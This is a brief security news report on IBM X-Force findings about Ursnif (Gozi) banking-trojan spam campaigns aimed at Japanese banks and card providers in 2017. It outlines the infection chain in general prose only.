Malspam campaigns designed to spread the Ursnif banking trojan have been heavily targeting Japanese banks and payment card providers in 2017, especially since September, according to IBM's X-Force research team.
This attacks has been leveraging Ursnif, also known as Gozi, to steal data from secure sessions, perform web injections and execute page redirections, reports Limor Kessem, IBM cybersecurity expert, in a company blog post on Thursday. The malware targets not only banking credentials, but also local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites, the report continues.
Because the targets in each successive attack have been the same, IBM posits that one threat actor is responsible for all of the spam campaigns, most of which infect victims with fake attachments designed to impersonate Japanese financial services and payment card providers.
"In other malspam versions, users receive an HTML link that leads to an archive (.zip) file containing JavaScript, which launches a PowerShell script that fetches the payload from a remote server and infects the user with Ursnif," Kessem writes. "The payload appears to be served from web resources the attackers registered to serve the malicious code, not from hijacked domains."
